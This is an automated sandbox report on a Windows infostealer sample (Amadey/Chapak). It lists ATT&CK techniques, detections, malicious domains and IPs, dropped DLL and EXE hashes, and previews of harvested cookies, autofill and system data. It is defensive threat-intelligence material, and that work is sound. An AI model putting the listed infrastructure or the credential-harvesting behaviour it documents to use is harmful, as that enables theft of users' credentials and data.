Source: Yara match, File source: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: wKYTg7Gp6P.exe PID: 6924, type: MEMORY
Source: Yara match, File source: 0.2.wKYTg7Gp6P.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.wKYTg7Gp6P.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.wKYTg7Gp6P.exe.2180e50.1.raw.unpack, type: UNPACKEDPE

                              Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| Valid Accounts | Windows Management Instrumentation 1 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 1 | OS Credential Dumping 2 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Data Obfuscation 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Native API 1 | Registry Run Keys / Startup Folder 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 4 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Command and Scripting Interpreter 2 | Logon Script (Windows) | Process Injection 212 | Obfuscated Files or Information 3 | Credentials in Registry 2 | File and Directory Discovery 4 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Encrypted Channel 22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Software Packing 23 | Credentials In Files 1 | System Information Discovery 66 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Security Software Discovery 131 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 14 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Modify Registry 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 21 | DCSync | Process Discovery 13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 212 | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | NTFS File Attributes 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |

                              Behavior Graph

[Behavior graph image not preserved. Behavior Graph ID: 399582; Sample: wKYTg7Gp6P.exe; Start date: 28/04/2021; Architecture: WINDOWS; Score: 100]

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

| Source | Detection | Scanner | Label |
| wKYTg7Gp6P.exe | 49% | Virustotal | |
| wKYTg7Gp6P.exe | 59% | ReversingLabs | Win32.Trojan.Chapak |
| wKYTg7Gp6P.exe | 100% | Joe Sandbox ML | |

                              Dropped Files

| Source | Detection | Scanner | Label |
| C:\ProgramData\1a9f26b569d5df\cred.dll | 100% | Avira | HEUR/AGEN.1137247 |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll | 100% | Avira | HEUR/AGEN.1137247 |
| C:\ProgramData\1a9f26b569d5df\scr.dll | 100% | Avira | HEUR/AGEN.1136939 |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll | 100% | Avira | HEUR/AGEN.1136939 |
| C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exe | 100% | Joe Sandbox ML | |
| C:\ProgramData\M7WCJ84VE5TXJ0R4.exe | 100% | Joe Sandbox ML | |
| C:\ProgramData\1a9f26b569d5df\cred.dll | 83% | ReversingLabs | Win32.Infostealer.Decred |
| C:\ProgramData\1a9f26b569d5df\scr.dll | 83% | ReversingLabs | Win32.Trojan.Amadey |
| C:\ProgramData\freebl3.dll | 0% | Metadefender | |
| C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
| C:\ProgramData\mozglue.dll | 3% | Metadefender | |
| C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
| C:\ProgramData\msvcp140.dll | 0% | Metadefender | |
| C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
| C:\ProgramData\nss3.dll | 0% | Metadefender | |
| C:\ProgramData\nss3.dll | 0% | ReversingLabs | |

                              Unpacked PE Files

| Source | Detection | Scanner | Label |
| 21.2.rundll32.exe.2570000.1.unpack | 100% | Avira | HEUR/AGEN.1108768 |
| 0.3.wKYTg7Gp6P.exe.2250000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen |
| 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen |

                              Domains

| Source | Detection | Scanner | Label |
| ukedocumentary.com | 0% | Virustotal | |

                              URLs


                              Domains and IPs

                              Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| ukedocumentary.com | 89.184.92.210 | true | true | | unknown |
| api.faceit.com | 104.17.63.50 | true | false | | high |

                                Contacted URLs


                                URLs from Memory and Binaries


                                                          Contacted IPs


                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.17.63.50 | api.faceit.com | United States | 13335 | CLOUDFLARENETUS | false
89.184.92.210 | ukedocumentary.com | Ukraine | 28907 | MIROHOSTWebhostingdatacenteranddomainnamesregistrati | true
78.47.81.226 | unknown | Germany | 24940 | HETZNER-ASDE | false
176.111.174.114 | unknown | Russian Federation | 201305 | WILWAWPL | true

                                                          Private

                                                          IP
                                                          192.168.2.1
                                                          192.168.2.4

                                                          General Information

                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                          Analysis ID:399582
                                                          Start date:28.04.2021
                                                          Start time:22:57:46
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 26s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:wKYTg7Gp6P.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:27
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@21/30@2/6
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 86%
                                                          • Number of executed functions: 182
                                                          • Number of non-executed functions: 165
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          • Excluded IPs from analysis (whitelisted): 20.82.209.183, 52.113.196.254, 93.184.220.29, 13.107.3.254, 13.107.246.254, 104.42.151.234, 13.64.90.137, 92.122.145.220, 168.61.161.212, 104.43.139.144, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
22:59:09 | API Interceptor | 2610x Sleep call for process: blfte.exe modified
22:59:37 | API Interceptor | 20x Sleep call for process: rundll32.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs


                                                                                                  Domains


                                                                                                  ASN


                                                                                                  JA3 Fingerprints

                                                                                                  • 104.17.63.50
                                                                                                  Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50
                                                                                                  .htmGet hashmaliciousBrowse
                                                                                                  • 104.17.63.50

                                                                                                  Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\ProgramData\freebl3.dll
• IMG_8401_302_1076.doc
• Mga2NdfMyb.exe
• EtnlEBRJwT.exe
• SBYnyLbDrt.exe
• NIxm9vbD6u.exe
• SkKcQaHEB8.exe
• HBS_5012306171.doc
• fdd6b649413776c157e7029b545d9e47a62b9decd6b2a.exe
• IMG650617250.xls
• 31768ba567580677ef466b1451e012d1fd35341ca7ec9.exe
• IMG60378611.doc
• P20200107.DOC
• RFQ-NEW ORDER BERUIT 67271929.xlsx
• New order.doc
• IMG850007630.exe
• c5d84b10_by_Libranalysis.exe
• vOKzu00mm0.exe
• AufXNtnyxx.exe
• Hcq7GTXl1a.exe
• 5ye5EA4o8s.exe

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\ProgramData\1a9f26b569d5df\cred.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):127488
                                                                                                                                          Entropy (8bit):6.506297388263336
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:WeZmogDk+xTMLObNlEB+VSdQgXHOPz2XrLekm9:WeZkgOThNlIWzo
                                                                                                                                          MD5:985F9C4D8BF231CA08046BCD44D558EB
                                                                                                                                          SHA1:DE5711528D94DAB76186D9695CE19C3C6C26EEC9
                                                                                                                                          SHA-256:78322121578342E588375350F56EDB5E0A6D4B889C6425814590AFD1A967E650
                                                                                                                                          SHA-512:939DED352BF569DDC0EC01C642FB6DDB12D055B8A785FB717DAA63E9E3F141FF13A40291C18DF2D8EA28B2860F91067B9CFD1A740A587B7726D9CB293155E44F
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\ProgramData\1a9f26b569d5df\cred.dll, Author: Joe Security
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                          Reputation:low
                                                                                                                                          C:\ProgramData\1a9f26b569d5df\scr.dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):227328
                                                                                                                                          Entropy (8bit):6.551095959374544
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:SJ+WK/pvT7arfwKFzDTsv5oaTh45CjBscX9TlHN:JJpb7Y7vf5i5X9TFN
                                                                                                                                          MD5:A48DC2DA2655FD049E37E36FCDA28FBA
                                                                                                                                          SHA1:96CE27AB5FEC62C6AC3ED96DD1BDC2DEFAD5499E
                                                                                                                                          SHA-256:76F6C712403A2F6213390AB2A72A82C98C9C48E1B1BDE182AA5932BD02A06D43
                                                                                                                                          SHA-512:37AD66440213CC29EC658158151366AFD077A2FF941323B4190279A4344F1B4C55109A5CF80B96ABD9BD4D07741A8CDAEC5D3651C53B0DD87F2E720C73264490
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                          Reputation:low
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\d06ed635-68f6-4e9a-955c-4899f5f57b9a5987367876.zip
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):108133
                                                                                                                                          Entropy (8bit):7.991712087050555
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:3072:mdjR7WZEUCjtg7N/QX/sNiizLOR5gPseutNr:mdj8ZEUT7N/+6iizLKEstXr
                                                                                                                                          MD5:BE84BE8A21921CE7CF9FE786D2A04C51
                                                                                                                                          SHA1:84081C95ECA4D1F609B55D451198BE9E6898C503
                                                                                                                                          SHA-256:8817BDFA9296C561F232A8564F63B4451D6983BF72F641F3FB5D5A3F8B208EEA
                                                                                                                                          SHA-512:D0EE7F31187F1E779076A8EFE50B7B3DCCCC150C9B28E2502B6A74E48D6AF556E55E550217B0AB5ED1E388651300D16465079B30804D9A1D8849D70D6DA21702
                                                                                                                                          Malicious:false
Preview: ZIP archive; entry names visible in the truncated raw dump: /Autofill/Google Chrome_Default.txt, /CC/Google Chrome_Default.txt, /Cookies/Edge_Cookies.txt, /Cookies/Google Chrome_Default.txt, /Cookies/IE_Cookies.txt, /F
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\Google Chrome_Default.txt
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):218
                                                                                                                                          Entropy (8bit):5.784604756829041
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:PkopYjdZWAUEbhTqKxUNHdHZ2HmwhZZZHwFnAVnn:copYxZdUwsb9HZ2pHRtn
                                                                                                                                          MD5:FC288C9A9642E747261A8AED0534BEA4
                                                                                                                                          SHA1:A8D655F06F5CFD9CAB34094EEB229071E536CC27
                                                                                                                                          SHA-256:9EF6B8DFE321BF6B0A505D91D48D2DD9BFC09B3BC1962CC62AA59C17718C166D
                                                                                                                                          SHA-512:A5CFC1508041932957E00049242A42C38F314EE713B1CEDF90FC5478DE8FEF059A81276AD6441B66534563B100F44CCE1EF025EB3BCA1CF76F6C660537F81060
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .google.com.FALSE./.FALSE.1617254995.NID.204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78..
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Files\Default.zip
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:Zip archive data (empty)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):22
                                                                                                                                          Entropy (8bit):1.0476747992754052
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:pjt/l:Nt
                                                                                                                                          MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                                                                          SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                                                                          SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                                                                          SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK....................
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\information.txt
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:ISO-8859 text, with very long lines, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):12786
                                                                                                                                          Entropy (8bit):5.3328250306085785
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:vcOIO3eVarX2EpDjSCbpgBdQXRsg8nbNqqN:dxOVarX2E5SCbpgUX25boqN
                                                                                                                                          MD5:9A7FE4677895D1F90CC2B7385F2808EB
                                                                                                                                          SHA1:35C21EBD0350CD292549294BEE4E42BD63C40B83
                                                                                                                                          SHA-256:9C7D4B670A928F6F37BC305EDA930AEC0A22E1B16638B24B36EBD1190AFD9C98
                                                                                                                                          SHA-512:FCC21C6032159DF67037F8636E5516E7B3352274D50557BF45B84D76CAA36EB16E9EAE370268318DE80D6AA3BB5C8288363FE4FF69B1BF09F3DCC1168E580897
                                                                                                                                          Malicious:false
Preview:
Version: 38.6

Date: Wed Apr 28 22:58:45 2021
MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a
GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963

Path: C:\Users\user\Desktop\wKYTg7Gp6P.exe
Work Dir: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ

Windows: Windows 10 Pro [x64]
Computer Name: 019635
User Name: user
Display Resolution: 1280x1024
Display Language: en-US
Keyboard Languages: English (United States)
Local Time: 28/4/2021 22:58:45
TimeZone: UTC1

[Hardware]
Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz
CPU Count: 4
RAM: 8191 MB
VideoCard: Microsoft Basic Display Adapter

[Processes]
---------- System [4]
------------------------------ Registry [88]
- smss.exe [300]
- csrss.exe [400]
- wininit.exe [476]
- csrss.exe [488]
- services.exe [568]
- winlogon.exe [576]
- lsass.exe [592]
- fontdrvhost.exe [692]
- svchost.exe [712]
- fontdrvhost.exe [724]
- svchost.exe [800]
- svchost.exe [84
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\screenshot.jpg
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):106376
                                                                                                                                          Entropy (8bit):7.930391321938815
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:/BanvT6q0Q30GHpQhuEqsIyEY8kmpxK1mc:/8vTEQE62hNZ8pOz
                                                                                                                                          MD5:55945602A41B65536293EF0BC653B3D0
                                                                                                                                          SHA1:5FF261CCC5C21A85E6312FBEE3D7742928D94FB0
                                                                                                                                          SHA-256:B4ECE390AE54D8A954BD9A7942BCEC505CEDDDFE7BB0FC9F277AE61AB58A0FF8
                                                                                                                                          SHA-512:EBA91D8948F3E93C15BE91C7D21DF6875DBC93FED5CB7F2665DA7C2899AA844F4EF34860FB6D95A499825F88F321461B92795BD976B676A58EB3A412A7E99BE4
                                                                                                                                          Malicious:false
                                                                                                                                          C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\temp
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):327680
                                                                                                                                          Entropy (8bit):0.8629517870531553
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:7HWU3iVy/BBE3uNBI0olG4oN03r9lgbFB/1Vum73r9lgbFB/1Vumq:6oiWBBjN20olG4oNQraFB/JraFB/Q
                                                                                                                                          MD5:449985B160AA92D02AAB2D8FE731B730
                                                                                                                                          SHA1:1892FE55BB7633EFA959DB3AFB97A54CC433C161
                                                                                                                                          SHA-256:EC26B9D21BF0D80653D3A8938F97B951198018771A8D656F7C29461E1A9ED0CA
                                                                                                                                          SHA-512:B3016A95AFCF699893BBECB28D272A6424B18416870CFE8BA93D1CD9D29C50513EA293F15B5423D6527820761D9D630D9104513D6D60BA76C7C504B6F1C2DA7C
                                                                                                                                          Malicious:false
                                                                                                                                          C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):290304
                                                                                                                                          Entropy (8bit):6.9441301701352725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:QyRnLkiC4K+lDKzhQd22R+hb8L6COx6bHpk:7IiC4K6H0bK1oIHp
                                                                                                                                          MD5:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          SHA1:712FBB4DF005439B9810090FD3A2962848E252C4
                                                                                                                                          SHA-256:B5A399C0EA40983ABC68B828CCB14EFDE2DB90C047BBFBA9AE418317CE7F036D
                                                                                                                                          SHA-512:937BFD9845CC25A6739B8DF0CAC685C5499F4D55D5F70FFF5CE61A4569B7BE96D84E987E001B8E8109200C485F681BCC86911A29CC5E5E45B978DBACE7DA2CE3
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          C:\ProgramData\M7WCJ84VE5TXJ0R4.exe:Zone.Identifier
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):16
                                                                                                                                          Entropy (8bit):3.452819531114783
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Rs2lM9n:K2W9n
                                                                                                                                          MD5:93E357749C1770188119BDA62467BD23
                                                                                                                                          SHA1:D296E9961918F3350D15E659735BA3BC731BE11C
                                                                                                                                          SHA-256:43BDCDD2C6DDA95363575BD475B28C3A2F80D16900177404CE8DC5981848890E
                                                                                                                                          SHA-512:12C53E1E35FAB0E2D8BBE2265858C19BA0FE37EE2F1108459FEACC5D0DE8115E9AF821F136EF2128D5557CB5170AAC3692A6405A5B6B04BE3EEAEF002A7E9570
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: :Zone.Identifier
                                                                                                                                          C:\ProgramData\freebl3.dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):334288
                                                                                                                                          Entropy (8bit):6.807000203861606
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                                                                                          MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                                                                                          SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                                                                                          SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                                                                                          SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: IMG_8401_302_1076.doc, Detection: malicious
                                                                                                                                          • Filename: Mga2NdfMyb.exe, Detection: malicious
                                                                                                                                          • Filename: EtnlEBRJwT.exe, Detection: malicious
                                                                                                                                          • Filename: SBYnyLbDrt.exe, Detection: malicious
                                                                                                                                          • Filename: NIxm9vbD6u.exe, Detection: malicious
                                                                                                                                          • Filename: SkKcQaHEB8.exe, Detection: malicious
                                                                                                                                          • Filename: HBS_5012306171.doc, Detection: malicious
                                                                                                                                          • Filename: fdd6b649413776c157e7029b545d9e47a62b9decd6b2a.exe, Detection: malicious
                                                                                                                                          • Filename: IMG650617250.xls, Detection: malicious
                                                                                                                                          • Filename: 31768ba567580677ef466b1451e012d1fd35341ca7ec9.exe, Detection: malicious
                                                                                                                                          • Filename: IMG60378611.doc, Detection: malicious
                                                                                                                                          • Filename: P20200107.DOC, Detection: malicious
                                                                                                                                          • Filename: RFQ-NEW ORDER BERUIT 67271929.xlsx, Detection: malicious
                                                                                                                                          • Filename: New order.doc, Detection: malicious
                                                                                                                                          • Filename: IMG850007630.exe, Detection: malicious
                                                                                                                                          • Filename: c5d84b10_by_Libranalysis.exe, Detection: malicious
                                                                                                                                          • Filename: vOKzu00mm0.exe, Detection: malicious
                                                                                                                                          • Filename: AufXNtnyxx.exe, Detection: malicious
                                                                                                                                          • Filename: Hcq7GTXl1a.exe, Detection: malicious
                                                                                                                                          • Filename: 5ye5EA4o8s.exe, Detection: malicious
                                                                                                                                          C:\ProgramData\mozglue.dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):137168
                                                                                                                                          Entropy (8bit):6.78390291752429
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                                                                                          MD5:8F73C08A9660691143661BF7332C3C27
                                                                                                                                          SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                                                                                          SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                                                                                          SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 3%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          C:\ProgramData\msvcp140.dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):440120
                                                                                                                                          Entropy (8bit):6.652844702578311
                                                                                                                                          Encrypted:false
